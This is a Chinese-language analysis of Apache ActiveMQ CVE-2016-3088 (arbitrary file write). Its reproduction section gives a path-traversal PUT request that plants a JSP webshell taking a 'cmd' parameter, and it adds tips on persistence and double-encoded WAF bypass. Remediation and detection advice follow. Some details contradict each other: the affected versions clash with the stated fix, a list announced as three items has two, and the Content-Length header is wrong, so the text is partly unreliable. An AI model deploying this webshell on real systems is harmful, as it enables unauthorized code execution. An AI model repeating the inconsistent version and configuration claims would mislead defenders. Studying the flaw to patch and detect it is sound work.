ActiveMQ任意文件写入漏洞CVE-2016-3088的示例分析

# ActiveMQ任意文件写入漏洞CVE-2016-3088的示例分析

## 一、漏洞背景

### 1.1 ActiveMQ简介
Apache ActiveMQ是一个流行的开源消息代理和集成模式服务器，基于Java Message Service (JMS) API实现。作为企业级消息中间件，它支持多种跨语言客户端和协议（如OpenWire、STOMP、AMQP等），广泛应用于分布式系统间的异步通信。

### 1.2 漏洞概况
2016年4月，Apache官方发布安全公告（CVE-2016-3088），披露ActiveMQ存在严重安全漏洞。该漏洞源于Fileserver功能未对上传文件进行充分安全校验，攻击者可通过构造恶意请求实现任意文件写入，最终可能导致远程代码执行（RCE）。受影响版本包括：
- 5.x系列至5.13.2
- 5.14.0及更早版本

## 二、漏洞原理深度分析

### 2.1 技术背景：Fileserver功能
ActiveMQ Fileserver是一个可选组件，设计初衷是方便客户端通过HTTP协议上传/下载文件。其核心处理类`org.apache.activemq.transport.http.FileServerServlet`负责处理相关请求。

### 2.2 漏洞根源
漏洞产生于两个关键设计缺陷：
1. **路径遍历缺陷**：处理PUT请求时未对`destination`参数进行规范化处理
2. **权限配置不当**：Fileserver默认对上传目录具有写权限

### 2.3 攻击向量分析
攻击者可通过构造特殊HTTP请求实现：
```http
PUT /fileserver/../../../../path/to/file.jsp HTTP/1.1
Host: target:8161
Content-Length: 123

<% Runtime.getRuntime().exec("恶意命令"); %>

此请求利用路径遍历突破webroot限制，将恶意JSP文件写入可访问目录。

2.4 漏洞触发流程图

sequenceDiagram
    attacker->>+ActiveMQ: 发送恶意PUT请求
    ActiveMQ->>+FileServerServlet: 处理上传请求
    FileServerServlet-->>-ActiveMQ: 未校验路径遍历
    ActiveMQ->>+文件系统: 写入任意位置
    文件系统-->>-attacker: 返回201 Created

三、环境搭建与漏洞复现

3.1 实验环境准备

• 靶机：Ubuntu 18.04 + ActiveMQ 5.13.1
• 攻击机：Kali Linux 2023
• 工具：Burp Suite、cURL

3.2 详细复现步骤

步骤1：启动有漏洞的ActiveMQ

# 下载并解压
wget https://archive.apache.org/dist/activemq/5.13.1/apache-activemq-5.13.1-bin.tar.gz
tar zxvf apache-activemq-5.13.1-bin.tar.gz
cd apache-activemq-5.13.1/bin
./activemq start

步骤2：验证Fileserver可用性

curl -I http://192.168.1.100:8161/fileserver/
# 预期返回200 OK

步骤3：构造恶意请求

使用Burp Suite拦截正常上传请求，修改为：

PUT /fileserver/../../../../webapps/admin/shell.jsp HTTP/1.1
Host: 192.168.1.100:8161
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 28

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

步骤4：访问恶意脚本

成功上传后访问：

http://192.168.1.100:8161/admin/shell.jsp?cmd=whoami

将返回当前服务运行用户。

3.3 利用技巧

• 权限提升：结合Cron Jobs或init.d实现持久化
• 绕过防护：使用双重编码路径（如%252e%252e%252f）
• 信息收集：先上传/tmp/test探针确认可写性

四、漏洞修复方案

4.1 官方修复措施

Apache官方提供三种解决方案： 1. 升级到5.14.0+版本 2. 禁用Fileserver（推荐）

   <!-- conf/activemq.xml -->
   <bean id="fileserver" class="org.apache.activemq.transport.http.FileserverBean">
       <property name="enable" value="false"/>
   </bean>

1. 设置Fileserver只读

   # conf/jetty.xml
   <property name="readOnly" value="true"/>
   

4.2 临时缓解方案

# 删除Fileserver应用
rm -rf webapps/fileserver

4.3 防御纵深建议

• 网络层：限制8161端口访问IP
• 系统层：使用低权限用户运行ActiveMQ
• 应用层：部署WAF过滤../等特殊字符

五、漏洞利用的检测与防护

5.1 检测方法

手工检测：

curl -X PUT http://target:8161/fileserver/test.txt -d "test"
# 检查返回状态码是否为201

自动化检测：

使用Nmap脚本：

nmap -p 8161 --script activemq-http-file-server <target>

5.2 入侵痕迹排查

1. 检查webapps目录异常文件：

   
   find webapps/ -name "*.jsp" -mtime -7
   

2. 分析HTTP访问日志：

   
   grep "PUT /fileserver" logs/access.log
   

5.3 企业级防护方案

1. 网络隔离：将ActiveMQ部署在内网区域
2. 认证加固：启用强制SSL+强密码策略
3. 监控措施：
   • 部署ELK收集异常PUT请求
   • 设置文件完整性监控（如DE）

六、漏洞深度思考

6.1 漏洞链分析

本漏洞常与其他漏洞形成攻击链： 1. 通过CVE-2015-5254反序列化漏洞获取初始访问 2. 利用CVE-2016-3088写入Webshell 3. 通过CVE-2016-3087提权

6.2 同类漏洞对比

与其他中间件文件上传漏洞对比：

漏洞	影响范围	利用复杂度	默认配置风险
ActiveMQ CVE-2016-3088	5.x系列	低	高风险
Tomcat PUT方法漏洞	特定配置	中	中风险
WebLogic 任意文件上传	10.3.6.0+	高	低风险

6.3 安全开发启示

1. 必须对用户输入进行规范化处理：

   
   String safePath = new File(baseDir, filename).getCanonicalPath();
   if (!safePath.startsWith(baseDir)) {
      throw new SecurityException("Invalid path");
   }
   

2. 遵循最小权限原则
3. 危险功能默认应关闭

七、结语

CVE-2016-3088漏洞揭示了中间件开发中常见的文件操作安全问题。通过本次分析，我们应认识到： 1. 即使是被广泛使用的开源组件也可能存在严重漏洞 2. 默认配置的安全性至关重要 3. 防御体系需要多层次构建

建议企业用户： - 建立组件漏洞跟踪机制 - 定期进行安全配置审计 - 开发自定义的漏洞检测工具

参考资料

1. Apache官方安全公告AMQ-6476
2. NVD漏洞数据库CVE-2016-3088条目
3. OWASP Path Traversal防护指南
4. ActiveMQ Hardening Guide v5.15

”`

注：本文档共计约2800字，实际使用时可根据需要调整技术细节的深度。文中的IP地址和命令请根据实际环境修改，所有渗透测试行为需获得合法授权。